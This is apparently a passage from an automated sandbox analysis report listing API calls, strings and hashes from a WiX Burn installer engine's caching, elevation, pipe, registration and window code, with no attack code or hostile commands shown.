• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 008B78EB
• SysFreeString.OLEAUT32(00000000), ref: 008B7916
• SysFreeString.OLEAUT32(00000000), ref: 008B798D
• SysFreeString.OLEAUT32(00000000), ref: 008B79D9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
Similarity
• API ID: String$Compare$Free
• String ID: `<u$comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
• API String ID: 318886736-782967201
APIs
  • Part of subcall function 0087D4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00887040,000000B8,00000000,?,00000000,75C0B390), ref: 0087D4B7
  • Part of subcall function 0087D4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0087D4C6
  • Part of subcall function 0087D4A8: LeaveCriticalSection.KERNEL32(000000D0,?,00887040,000000B8,00000000,?,00000000,75C0B390), ref: 0087D4DB
• CreateThread.KERNEL32(00000000,00000000,008857BD,?,00000000,00000000), ref: 00886E34
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00874522,?,008BB500,?,00874846,?,?), ref: 00886E43
• CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00874522,?,008BB500,?,00874846,?,?), ref: 00886EA0
• ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 00886F92
• CloseHandle.KERNEL32(00000000), ref: 00886F9B
• CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 00886FB5
  • Part of subcall function 0089BD05: SetThreadExecutionState.KERNEL32(80000001), ref: 0089BD0A
Strings
• UX aborted apply begin., xrefs: 00886C94
• Failed while caching, aborting execution., xrefs: 00886E98
• Failed to cache engine to working directory., xrefs: 00886D71
• Failed to set initial apply variables., xrefs: 00886D02
• core.cpp, xrefs: 00886C8A, 00886E67
• Failed to create cache thread., xrefs: 00886E71
• crypt32.dll, xrefs: 00886ECD, 00886EE7, 00886FB4
• Failed to elevate., xrefs: 00886D94
• Another per-machine setup is already executing., xrefs: 00886DC8
• Failed to register bundle., xrefs: 00886DEE
• Engine cannot start apply because it is busy with another action., xrefs: 00886C28
• Another per-user setup is already executing., xrefs: 00886CD8
Memory Dump Source
• Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
Similarity
• API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
• String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
• API String ID: 2169948125-4292671789
APIs
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 008B8161
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 008B817C
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 008B821F
• CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,008BB518,00000000), ref: 008B825E
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 008B82B1
• CompareStringW.KERNEL32(0000007F,00000000,008BB518,000000FF,true,000000FF), ref: 008B82CF
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 008B8307
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 008B844B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
Similarity
• API ID: CompareString
• String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
• API String ID: 1825529933-3037633208
APIs
  • Part of subcall function 0088E2AF: LoadBitmapW.USER32(?,00000001), ref: 0088E2E5
  • Part of subcall function 0088E2AF: GetLastError.KERNEL32 ref: 0088E2F1
• LoadCursorW.USER32(00000000,00007F00), ref: 0088E429
• RegisterClassW.USER32(?), ref: 0088E43D
• GetLastError.KERNEL32 ref: 0088E448
• UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 0088E54D
• DeleteObject.GDI32(00000000), ref: 0088E55C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
Similarity
• API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
• String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
• API String ID: 164797020-2188509422
APIs
• WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,0089BC85,00000001), ref: 00899E46
• GetLastError.KERNEL32(?,0089BC85,00000001), ref: 00899FB6
• GetExitCodeThread.KERNEL32(00000001,00000000,?,0089BC85,00000001), ref: 00899FF6
• GetLastError.KERNEL32(?,0089BC85,00000001), ref: 0089A000
Strings
• Failed to execute MSP package., xrefs: 00899ECB
• Failed to get cache thread exit code., xrefs: 0089A031
• Invalid execute action., xrefs: 0089A056
• Cache thread exited unexpectedly., xrefs: 0089A047
• Failed to execute dependency action., xrefs: 00899F36
• Failed to execute compatible package action., xrefs: 00899F73
• Failed to load compatible package on per-machine package., xrefs: 00899F5C
• apply.cpp, xrefs: 00899FDD, 0089A027
• Failed to execute EXE package., xrefs: 00899E7D
• Failed to execute MSI package., xrefs: 00899EA6
• Failed to wait for cache check-point., xrefs: 00899FE7
• Failed to execute MSU package., xrefs: 00899EFB
• Failed to execute package provider registration action., xrefs: 00899F17
Memory Dump Source
• Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
Similarity
• API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
• String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
• API String ID: 3703294532-2662572847
APIs
  • Part of subcall function 008B3AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 008B3B3E
• RegCloseKey.ADVAPI32(00000000,?,008C0D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 0087F440
  • Part of subcall function 008B14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0087F28D,008C0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008B14BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
Similarity
• API ID: CloseValueVersion
• String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
• API String ID: 2348918689-2631711097
                                                            • Opcode ID: b892c255659bbc68a0157696b69adc830cbc8f74e18b3772edaa69cbed5ff9c8
                                                            • Instruction ID: 56c5f7d607a8cf9e1e5a529be59e0246ecf2d0d8dde0002c68a7146b86d4e273
                                                            • Opcode Fuzzy Hash: b892c255659bbc68a0157696b69adc830cbc8f74e18b3772edaa69cbed5ff9c8
                                                            • Instruction Fuzzy Hash: E751E332D4062AFBCF219AA58C4AFAEB674FB00724F108139FA18F6356D774D9509B85
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(74DE8FB0,00000002,00000000), ref: 0089CC9D
                                                              • Part of subcall function 00884D8D: UuidCreate.RPCRT4(?), ref: 00884DC0
                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,00892401,?,?,00000000,?,?,?), ref: 0089CD7B
                                                            • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 0089CD85
                                                            • GetProcessId.KERNEL32(00892401,?,?,00000000,?,?,?,?), ref: 0089CDBD
                                                              • Part of subcall function 008854DC: lstrlenW.KERNEL32(?,?,00000000,?,008BB500,?,00000000,?,0087452F,?,008BB500), ref: 008854FD
                                                              • Part of subcall function 008854DC: GetCurrentProcessId.KERNEL32(?,0087452F,?,008BB500), ref: 00885508
                                                              • Part of subcall function 008854DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0087452F,?,008BB500), ref: 0088553F
                                                              • Part of subcall function 008854DC: ConnectNamedPipe.KERNEL32(?,00000000,?,0087452F,?,008BB500), ref: 00885554
                                                              • Part of subcall function 008854DC: GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 0088555E
                                                              • Part of subcall function 008854DC: Sleep.KERNEL32(00000064,?,0087452F,?,008BB500), ref: 00885593
                                                              • Part of subcall function 008854DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0087452F,?,008BB500), ref: 008855B6
                                                              • Part of subcall function 008854DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0087452F,?,008BB500), ref: 008855D1
                                                              • Part of subcall function 008854DC: WriteFile.KERNEL32(?,0087452F,008BB500,00000000,00000000,?,0087452F,?,008BB500), ref: 008855EC
                                                              • Part of subcall function 008854DC: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0087452F,?,008BB500), ref: 00885607
                                                              • Part of subcall function 008B0A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00874F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 008B0A38
                                                              • Part of subcall function 008B0A28: GetLastError.KERNEL32(?,?,00874F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008B0A46
                                                            • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0089CBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 0089CE41
                                                            • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0089CBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 0089CE50
                                                            • CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,0089CBEF,?,?,?,?,?,00000000,?,?,?), ref: 0089CE67
                                                            Strings
                                                            • Failed to create embedded pipe., xrefs: 0089CD27
                                                            • Failed to create embedded pipe name and client token., xrefs: 0089CD00
                                                            • Failed to wait for embedded process to connect to pipe., xrefs: 0089CDDF
                                                            • Failed to process messages from embedded message., xrefs: 0089CE04
                                                            • Failed to wait for embedded executable: %ls, xrefs: 0089CE24
                                                            • Failed to create embedded process at path: %ls, xrefs: 0089CDB3
                                                            • %ls -%ls %ls %ls %u, xrefs: 0089CD40
                                                            • Failed to allocate embedded command., xrefs: 0089CD54
                                                            • burn.embedded, xrefs: 0089CD38
                                                            • embedded.cpp, xrefs: 0089CDA6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
                                                            • String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                            • API String ID: 875070380-3803182736
                                                            • Opcode ID: 32db505c0e415eef91701b9b531a290e8f5a750c89e06c337fc15cf967736d6c
                                                            • Instruction ID: f27057de8b4adee35875d193e737f98367e10b7a977f1279fe0d9ebadd30db1c
                                                            • Opcode Fuzzy Hash: 32db505c0e415eef91701b9b531a290e8f5a750c89e06c337fc15cf967736d6c
                                                            • Instruction Fuzzy Hash: A2516D72D4122DBBDF12AA98DC06BEEBBB8FB04710F144122FA01F6291D7759A409BD1
                                                            APIs
                                                            • SysFreeString.OLEAUT32(?), ref: 0087EE4C
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • SysFreeString.OLEAUT32(?), ref: 0087EE04
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeHeapString$AllocateProcess
                                                            • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$`<u$registration.cpp
                                                            • API String ID: 336948655-956346883
                                                            • Opcode ID: fa8ffe40078a4768df898a9cc9d21357a5d0b977585d3301d5702d7dfe953412
                                                            • Instruction ID: 21a55ddfb9b27ac2120c5b0e56849a7c4f71e23d9254b36dbf0247cd2c4f3498
                                                            • Opcode Fuzzy Hash: fa8ffe40078a4768df898a9cc9d21357a5d0b977585d3301d5702d7dfe953412
                                                            • Instruction Fuzzy Hash: FB519436A0162ABBCB11DF58C885EAEBBB4FF08710B1485A9B919EB345C770DE009791
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,008B8468,00000001,?), ref: 008B7F9E
                                                            • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,008B8468,00000001,?), ref: 008B7FB9
                                                            • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,008B8468,00000001,?), ref: 008B7FD4
                                                            • CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,008B8468,00000001,?), ref: 008B8040
                                                            • CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,008B8468,00000001,?), ref: 008B8064
                                                            • CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,008B8468,00000001,?), ref: 008B8088
                                                            • CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,008B8468,00000001,?), ref: 008B80A8
                                                            • lstrlenW.KERNEL32(006C0064,?,008B8468,00000001,?), ref: 008B80C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString$lstrlen
                                                            • String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
                                                            • API String ID: 1657112622-2492263259
                                                            • Opcode ID: bfef9f286555ce4d3c637180ff4fb781236f1cffbe0305af751f4b3f9741edd6
                                                            • Instruction ID: 8ad22da27ff74dbc071ede616df4f7dfa17d2d75fec16c67ba97efd42c0aabb8
                                                            • Opcode Fuzzy Hash: bfef9f286555ce4d3c637180ff4fb781236f1cffbe0305af751f4b3f9741edd6
                                                            • Instruction Fuzzy Hash: 2D519D31688612FADB205E488C41FA67B66FB15770F208305FA34EE3E5DBB5E851CB90
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087A0B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open@16
                                                            • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                            • API String ID: 3613110473-2134270738
                                                            • Opcode ID: 9efd7812bd2a2fe7815b50a4e98d1e8755644d3a9bda5252ddc35ebbeb14dcae
                                                            • Instruction ID: 0932ec0ec5077683b5aeaa84bec1651e821c428ae0c008069c32308e9a56c3bc
                                                            • Opcode Fuzzy Hash: 9efd7812bd2a2fe7815b50a4e98d1e8755644d3a9bda5252ddc35ebbeb14dcae
                                                            • Instruction Fuzzy Hash: 5861F532D40118FFCB199AA8CD45DEE7B78FB84714F208065F919FA356D232DE009B92
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 00884B84
                                                            • GetLastError.KERNEL32 ref: 00884B92
                                                            • Sleep.KERNEL32(00000064), ref: 00884BB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorFileLastSleep
                                                            • String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
                                                            • API String ID: 408151869-3212458075
                                                            • Opcode ID: 838dc4304b662314e259cdc17a24186b6dce2feea2f58990e9ef784994778efb
                                                            • Instruction ID: 2258ef2369ee53a567b8d16bf6355e3169859c88ddbf8f3c4ed83509424c24cf
                                                            • Opcode Fuzzy Hash: 838dc4304b662314e259cdc17a24186b6dce2feea2f58990e9ef784994778efb
                                                            • Instruction Fuzzy Hash: 7D41E037D82637BBDB2166E48D06F5A7A68FB10720F111221FE10FA290D775ED4097D5
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,008804DF,InstallerVersion,InstallerVersion,00000000,008804DF,InstallerName,InstallerName,00000000,008804DF,Date,InstalledDate,00000000,008804DF,LogonUser), ref: 0087F733
                                                              • Part of subcall function 008B14F4: RegSetValueExW.ADVAPI32(00020006,008C0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0087F335,00000000,?,00020006), ref: 008B1527
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseValue
                                                            • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                            • API String ID: 3132538880-2703781546
                                                            • Opcode ID: e3aa8359b13ce3dee8825b50fc6a87b33cba0a27c8d540e21802980a76d29f3a
                                                            • Instruction ID: e0fa73940c491ec07aceb89de45706f5588d4e8859588ba3f135fcd7b248d54a
                                                            • Opcode Fuzzy Hash: e3aa8359b13ce3dee8825b50fc6a87b33cba0a27c8d540e21802980a76d29f3a
                                                            • Instruction Fuzzy Hash: 0E41E532A406A6BBCF136659CC02FEE7A75FB10B54B148175FA08F63A7C774DE10A681
                                                            APIs
                                                            • TlsSetValue.KERNEL32(?,?), ref: 0088E7FF
                                                            • RegisterClassW.USER32(?), ref: 0088E82B
                                                            • GetLastError.KERNEL32 ref: 0088E836
                                                            • CreateWindowExW.USER32(00000080,008C9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 0088E89D
                                                            • GetLastError.KERNEL32 ref: 0088E8A7
                                                            • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 0088E945
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                            • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                            • API String ID: 213125376-288575659
                                                            • Opcode ID: 51509807a2c76210dcb2928e2ae53f1613ecdb05f184aa1b8f742b57ab32b0d7
                                                            • Instruction ID: 6692e92d4d98d1dfd8ad201f9b8577b711531defc563db3345ab7660c0f01944
                                                            • Opcode Fuzzy Hash: 51509807a2c76210dcb2928e2ae53f1613ecdb05f184aa1b8f742b57ab32b0d7
                                                            • Instruction Fuzzy Hash: 82418372900229EBDB20ABA5DC49BDEBFB8FF08750F114165F915FB250D7B0A944CBA1
                                                            Strings
                                                            • Failed to copy filename for passthrough pseudo bundle., xrefs: 0089C9BE
                                                            • Failed to copy cache id for passthrough pseudo bundle., xrefs: 0089CA05
                                                            • Failed to copy install arguments for passthrough bundle package, xrefs: 0089CA62
                                                            • pseudobundle.cpp, xrefs: 0089C7A8, 0089C9A1, 0089C9DB
                                                            • Failed to copy key for passthrough pseudo bundle., xrefs: 0089C988
                                                            • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0089C9E7
                                                            • Failed to copy key for passthrough pseudo bundle payload., xrefs: 0089C9C5
                                                            • Failed to copy local source path for passthrough pseudo bundle., xrefs: 0089C9B7
                                                            • Failed to copy related arguments for passthrough bundle package, xrefs: 0089CA82
                                                            • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0089C9AD
                                                            • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 0089C7B4
                                                            • Failed to recreate command-line arguments., xrefs: 0089CA43
                                                            • Failed to copy download source for passthrough pseudo bundle., xrefs: 0089C98F
                                                            • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 0089CAAC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
